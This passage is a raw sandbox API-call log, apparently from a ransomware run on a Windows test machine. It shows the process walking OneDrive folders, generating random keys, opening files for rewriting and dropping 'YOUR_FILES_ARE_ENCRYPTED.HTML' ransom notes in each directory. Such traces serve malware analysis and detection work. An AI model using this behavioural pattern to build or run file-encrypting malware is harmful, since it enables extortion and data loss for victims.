out: param_1="9C") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="4A") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="28") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="98") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="7A") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="17") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="58") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="B5") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="CB") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="DD") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="78") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="CD") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="E7") returned 2 
[0162.084] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="D2") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="58") returned 2 [0162.085] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png" [0162.085] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.085] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0162.085] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4862730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4862730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4862730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x6c00a, dwReserved0=0x0, dwReserved1=0x60, cFileName="ScreenshotOptIn.png", cAlternateFileName="SCREEN~2.PNG")) returned 1 [0162.085] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png") returned 91 [0162.085] lstrcmpW (lpString1="ScreenshotOptIn.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.085] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0162.085] lstrlenW (lpString=".png") returned 4 [0162.085] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0162.085] SystemFunction036 (in: 
RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\screenshotoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0162.086] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=442378) returned 1 [0162.086] GetProcessHeap () returned 0x270000 [0162.086] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0162.088] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="9F") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="3B") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="F6") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="7F") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="4C") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="90") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="68") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="38") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="60") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="0A") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="8A") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="5E") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="99") returned 2 [0162.088] wsprintfW (in: 
param_1=0x4ebd146, param_2="%02X" | out: param_1="8C") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="80") returned 2 [0162.088] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="27") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="03") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="4F") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="06") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C2") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="43") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="AB") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="1D") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="EC") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F7") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="F3") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="75") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="1F") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="4D") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="35") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="A6") returned 2 [0162.089] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="5F") returned 2 [0162.090] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png" [0162.090] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.090] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0162.092] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9fdcfb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sd-arab", cAlternateFileName="")) returned 1 [0162.092] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab") returned 79 [0162.092] GetProcessHeap () returned 0x270000 [0162.092] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.092] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab" [0162.092] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\*" [0162.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9fdcfb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.096] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9fdcfb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.096] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.096] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.096] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.096] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.096] lstrlenW (lpString=".mui") returned 4 [0162.096] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.096] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa1f22f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa1f22f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.096] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.096] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sd-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.272] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: 
lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.275] CloseHandle (hObject=0x594) returned 1 [0162.275] GetProcessHeap () returned 0x270000 [0162.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.284] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sd-arab-pk", cAlternateFileName="SD-ARA~1")) returned 1 [0162.284] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk") returned 82 [0162.284] GetProcessHeap () returned 0x270000 [0162.284] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.285] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk" [0162.285] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\*" [0162.285] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.286] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa1f22f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.286] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.286] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.286] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.287] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.287] lstrlenW (lpString=".mui") returned 4 [0162.287] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.287] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4c5d10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4c5d10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.287] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.287] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sd-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sd-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.288] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.290] CloseHandle (hObject=0x594) returned 1 [0162.291] GetProcessHeap () returned 0x270000 [0162.292] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.292] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="si-lk", cAlternateFileName="")) returned 1 [0162.292] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk") returned 77 [0162.292] GetProcessHeap () returned 0x270000 [0162.292] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.292] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk" [0162.293] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\*" [0162.293] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.293] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4c5d10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.293] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.293] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.293] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.293] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.293] lstrlenW (lpString=".mui") returned 4 [0162.293] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.293] FindNextFileW (in: hFindFile=0x42f3280, 
lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa727310, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa727310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.293] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.294] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\si-lk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\si-lk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.294] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.297] CloseHandle (hObject=0x594) returned 1 [0162.297] GetProcessHeap () returned 0x270000 [0162.298] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.298] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa727310, 